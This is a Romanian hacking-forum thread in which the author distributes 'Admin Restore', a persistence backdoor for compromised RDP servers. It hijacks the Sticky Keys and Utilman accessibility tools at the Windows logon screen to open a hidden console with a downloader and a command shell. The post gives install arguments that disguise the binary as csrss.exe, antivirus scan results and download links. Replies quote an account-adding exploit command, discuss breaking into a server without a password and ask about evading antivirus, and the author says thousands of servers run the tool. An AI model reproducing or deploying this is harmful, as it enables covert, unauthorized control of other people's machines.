Maximus Posted February 17, 2013 Report Posted February 17, 2013 (edited) [RST] Admin Restore v1.2M-am folosit de sethc.exe/Utilman.exe doar ca folosesc alta metoda de instalare... nici un fel de "Take Ownership" sau "File Overwrite".Am creat mesaje false pentru High Contrast / Sticky Keys :Windows Vista/Server 2008/Windows 7/Server 2008 R2 :Desktop High ContrastDesktop Sticky KeysWinlogon Sticky KeysWinlogon High ContrastWindows XP/Windows Server 2003 :Desktop High ContrastDesktop Sticky KeysWinlogon Sticky KeysWinlogon High ContrastCum se foloseste ?In WinLogon apasam de 5x SHIFT sau ALT (Stanga) + SHIFT (Stanga) + PRINT SCREEN, va aparea unul din mesajele de mai sus ... apasam Ok/Cancel/Yes/No dupa care apasam TAB + SHIFT + ALT + CONTROL + DEL (nu trebuiesc apasate simultan) si va aparea consola de logare : da, dupa cum vedeti folosesc un "NumPad", doar numere pentru ca in v1.0 & v1.1 (desi nu le-am publicat) pe RDP-uri de Iran apasam Y spre ex si in textbox se tasta Z, NumPad-ul a rezolvat problema.Daca apasam Login fara sa tastam nimic Consola se va inchide, daca gresim parola de 5x consola se va inchide, iar daca tastam parola corecta va aparea asta :Avem un Downloader ce salveaza in %TEMP% , putem accesa informatia dupa descarcare prin CMD.exe, un mic Task Run pentru a porni cmd.exe si nu numai .., putem schimba setarile mesajelor false ... si pentru ca am citit postul utilizatorului sllrdp din Market, defapt user567 cu La rugamintea programatorului care vinde acest tool sa lass un feedback....Feedback-ul meu e 100 % pozitiv, programul functioneaza exact ca in video-ul de prezentare.singurul defect daca ias putea spune asa ceva ... e ca iti alegi un pass cand cumperi programulsi nu poti sal mai schimbi.am adaugat si optiunea de a schimba parola dupa instalare ...Daca dam click pe bannerul RST va aparea un mic "disclaimer" :iar daca dam click pe "RST ... Maximus Spide ... Center" va aparea un About : Cum se instaleaza ?In primul rand trebuie sa aveti drept de Administrator pe RDP.Installer-ul arata cam asa :Command Line Arguments (pentru iHack.exe nu pentru Install.exe):iHack.exe -i -n:[fisier exe] -pwd:[parola din numere] -h:[sethc.exe/Utilman.exe] -msg:[0/1 unde 0=false si 1=true]Ex : iHack.exe -i -n:csrss.exe -msg:1 -pwd:31337 -h:sethc.exeiHack.exe -iHack va deschide "disclaimer-ul" : Install.exe instaleaza si Msvbvm60.dll (va copia Msvbvm60.dll in directorul unde se va instala iHack.exe), asta pentr ca am intalnit probleme pe unele RDP-uri cu Windows Server 2003 pe ele.O poza din Winlogon (Laptopul meu)http://www.7image.ru/pics/0213/340439811.jpgVIDEO : SCAN :File InfoReport Date: 18.02.2013 01:02:29Link To Scan: http://elementscanner.net//?RE=85539f8891fd8e1dffac2263bebd5808File Name:iHack.exeFile Size: 625664 bytesMD5 Hash: beffce95e5afb14fc38260c07901507aSHA1 Hash: 8e5bacba52013be8cdf4b4b3c0093e5e14eb1736Status: CleanTotal Results: 0/35AVG Free-Clean.ArcaVir-Clean.Avast 5-Clean.AntiVir (Avira)-Clean.BitDefender-Clean.VirusBuster Internet Security-Clean.Clam Antivirus-Clean.COMODO Internet Security-Clean.Dr.Web-Clean.eTrust-Vet-Clean.F-PROT Antivirus-Clean.F-Secure Internet Security-Clean.G Data-Clean.IKARUS Security-Clean.Kaspersky Antivirus-Clean.McAfee-Clean.MS Security Essentials-Clean.ESET NOD32-Clean.Norman-Clean.Norton Antivirus-Clean.Panda Security-Clean.A-Squared-Clean.Quick Heal Antivirus-Clean.Solo Antivirus-Clean.Sophos-Clean.Trend Micro Internet Security-Clean.VBA32 Antivirus-Clean.Vexira Antivirus-Clean.Zoner AntiVirus-Clean.Ad-Aware-Clean.BullGuard-Clean.Immunet Antivirus-Clean.K7 Ultimate-Clean.NANO Antivirus-Clean.VIPRE-Clean.File InfoReport Date: 17.02.2013 13:02:36Link To Scan: Scan Result | Element ScannerFile Name:Install.exeFile Size: 219136 bytesMD5 Hash: aa53152cc4c6567f28022d69aa95f51eSHA1 Hash: 7f83f71aa8a72b2d8cb2ef41f32c0af700b97a29Status: INFECTEDTotal Results: 8/35AVG Free-Clean.ArcaVir-Clean.Avast 5-Clean.AntiVir (Avira)- TR/Crypt.ASPM.Gen.BitDefender- Gen:Heur.ManBat.1.VirusBuster Internet Security-Clean.Clam Antivirus-Clean.COMODO Internet Security-Clean.Dr.Web-Clean.eTrust-Vet-Clean.F-PROT Antivirus-Clean.F-Secure Internet Security- Gen:Heur.ManBat.1.G Data- Gen:Heur.ManBat.1.IKARUS Security- Virus.Win32.VBInject.Kaspersky Antivirus-Clean.McAfee-Clean.MS Security Essentials-Clean.ESET NOD32-Clean.Norman-Clean.Norton Antivirus-Clean.Panda Security-Clean.A-Squared- Virus.Win32.VBInject!IK.Quick Heal Antivirus-Clean.Solo Antivirus-Clean.Sophos-Clean.Trend Micro Internet Security-Clean.VBA32 Antivirus-Clean.Vexira Antivirus-Clean.Zoner AntiVirus-Clean.Ad-Aware-Clean.BullGuard- Gen:Heur.ManBat.1.Immunet Antivirus- Gen:Heur.ManBat.1.K7 Ultimate-Clean.NANO Antivirus-Clean.VIPRE-Clean.Download Link : https://www.dropbox.com/s/t0ilnhb9yzhixbh/Install.zip Parola : rstSper sa va fie folositor.P.S. Daca gasiti bug-uri/errors va rog lasati un comment sau PM me , descarcati https://www.dropbox.com/s/0hnq4f8q7r0ehsr/detect.exe si lasati ce e in textbox aici (va detecta sistemul de operare). MultumescP.S.2 Pentru versiuni personalizate PM me. @alinh0; eu chiar am crezut ca este vb de GetAdmin.exe, acel exploit pentru Win Server 2003 (parca) .. ma gandeam ca a aparut o varianta noua a exploit-ului dar tu .... http://www.7image.ru/pics/0213/340464789.png pus pe troll pustiu @begood; am descarcat programul lui alinh0 si l-am rulat pe XP in VMWARE, a fost un troll, probabil nu se astepta sa-l rulez in virtual machine. http://www.7image.ru/pics/0213/340464789.png "are el un exploit in C care deschide un cmd ascuns cu net user RubberDuck mudbath /add && net localgroup 'admtors' RubberDuck /add" probabil nici nu stie ca a gresit comanda ...Update 2/18/2013 :Command Line Arguments Bug Fixed (-msg:0/1 error)Link "permanent":[/FONT]https://rstforums.com/proiecte/AdminRestore.zip Edited March 21, 2013 by Nytro 4
alinh0 Posted February 17, 2013 Report Posted February 17, 2013 Felicitari. Foarte folositor. Am si eu un exploit in c care adauga un administrator chiar daca esti pe cont limited.
begood Posted February 17, 2013 Report Posted February 17, 2013 Ai putea vinde o versiune [pro] ce foloseste un exploit ca cel descris de alinh0. Felicitari !
alinh0 Posted February 18, 2013 Report Posted February 18, 2013 @alin: pe ce build-uri si arhitecturi funtioneaza?Toate, n-am testat pe win8.
Maximus Posted February 18, 2013 Author Report Posted February 18, 2013 ba nu-ti mai bate joc de utilizatori pe thread-ul meu cu exploit-ul tau ...
alinh0 Posted February 18, 2013 Report Posted February 18, 2013 ba nu-ti mai bate joc de utilizatori pe thread-ul meu cu exploit-ul tau ... Da , ti l-am dat pe cel gresit. In fine, lasa-l pe al meu, dar ce rost are toata chestia asta...daca In primul rand trebuie sa aveti drept de Administrator pe RDP.
Marcusul Posted February 18, 2013 Report Posted February 18, 2013 Apreciem efortul, insa daca trebuie sa avem noi drepturi de admin pe rdp atunci e unul din gramada.
prenumele Posted February 28, 2013 Report Posted February 28, 2013 (edited) eu am urmatoarea problema: am un server departe cu portul 3389 deschis. Eu nu stiu parola la Administrator, nici nu am acces sa ii fac instalarea pe acel server 2008 ca apoi sa am acces prin shift chei etc.cine se pricepe rog sa ma ajute. eu acum incerc cu parole lungi de 6 la 12 caractere se poate instala exe din exterior? va rog ajutati ma!nu am linux sa fac exploit.exe care sa l trimit la corespondent. Plus daca pun ipul local 192,168,,,, nu stiu daca va merge listeningul iar ipul real are dupa el mai multe locale Edited March 4, 2013 by prenumele merge pe win xp dar inca nu pe 7
prenumele Posted March 2, 2013 Report Posted March 2, 2013 (edited) cum se poate dezinstala? sau cum pot schimba parola dupa instalare? Edited March 4, 2013 by prenumele
Shin Posted March 13, 2013 Report Posted March 13, 2013 alinh0, e privat exploitul ala? altfel nu vad ce ce nu l-ai posta. Merci!
Maximus Posted March 13, 2013 Author Report Posted March 13, 2013 cum se poate dezinstala? sau cum pot schimba parola dupa instalare?te conectezi la rdp , apesi SHIFT de 5x (iti va aparea mesajul.. dai OK) apoi apesi TAB SHIFT ALT CONTROL DEL , bagi parola ...Change Login Password ( Numbers Only )
Maximus Posted December 3, 2013 Author Report Posted December 3, 2013 OFF : 3000 (numar rotunjit)de RDP-uri ruleaza acest soft :D:D
GarryOne Posted March 28, 2014 Report Posted March 28, 2014 OFF : 3000 (numar rotunjit)de RDP-uri ruleaza acest soft :D:DPasarea pe limba ei piere
Maximus Posted March 28, 2014 Author Report Posted March 28, 2014 (edited) Pasarea pe limba ei piere Lol , ai si backdoor pe langa statistici?nu ; http://undernetfans.comeze.com/adminrestore/index.php?count=true@GarryOne ; de ce nu iei mataluta aplicatia sa o studiezi ? si nu inteleg, tocmai acum va treziti sa faceti asemenea comentarii ? Edited March 28, 2014 by Maximus
GarryOne Posted March 28, 2014 Report Posted March 28, 2014 nu ; http://undernetfans.comeze.com/adminrestore/index.php?count=trueZi ca ai numai acel parametru GET
Maximus Posted March 28, 2014 Author Report Posted March 28, 2014 Zi ca ai numai acel parametru GET Corect, doar un singur parametru.Aplicatia are un "modul" de update, in caz ca fac undate sa fie la zi. Nu am mai lucrat la ea dar daca esti atent acel text este luat de pe o pagina -> http://undernetfans.comeze.com/adminrestore/update_check.php?ver=1.2 ; de aici si statistica ...
NonSTOP Posted July 15, 2015 Report Posted July 15, 2015 ???????, ????? ????????? ??? ?????: 1. ?????????? ?? ???????2. ?????? ????????? ?????, ???? ?? ????? ????? ?????????, ?? ?? ?????-?? ??????? ????????????, ? ? ???? ??????? ??????, ? ????????? ?? ????????? ?? ????... 3. ?????? ?????????? ???, ??? ????????? ?????? ?? ???????????, ?? ?????-?? ????????. ???????? ?? ????? ??????? ????????? ?????? ?????????, ??? ??? ? ??????? ??? ???? ??? ????? ???????, ?? ? ????? ?? ?????? ???.
Maximus Posted July 17, 2015 Author Report Posted July 17, 2015 @NonSTOP ; A new version will be ready at the end of August with new features , and more stable!
NonSTOP Posted July 17, 2015 Report Posted July 17, 2015 @NonSTOP ; A new version will be ready at the end of August with new features , and more stable!This is good news, but will be still some interesting programs \ skrpty for dedicated servers?
NonSTOP Posted October 18, 2015 Report Posted October 18, 2015 Hi update as I understand it not be?and I would like to ask why I can not go with your ip on this forum?
Maximus Posted October 18, 2015 Author Report Posted October 18, 2015 @NonSTOP ; Here is a short video ; Will soon be published
NonSTOP Posted October 18, 2015 Report Posted October 18, 2015 @NonSTOP ; Here is a short video ; Will soon be publishedNot bad, but that's possible to somehow hide the process and at all is not lost restart windose he?How does the antivirus?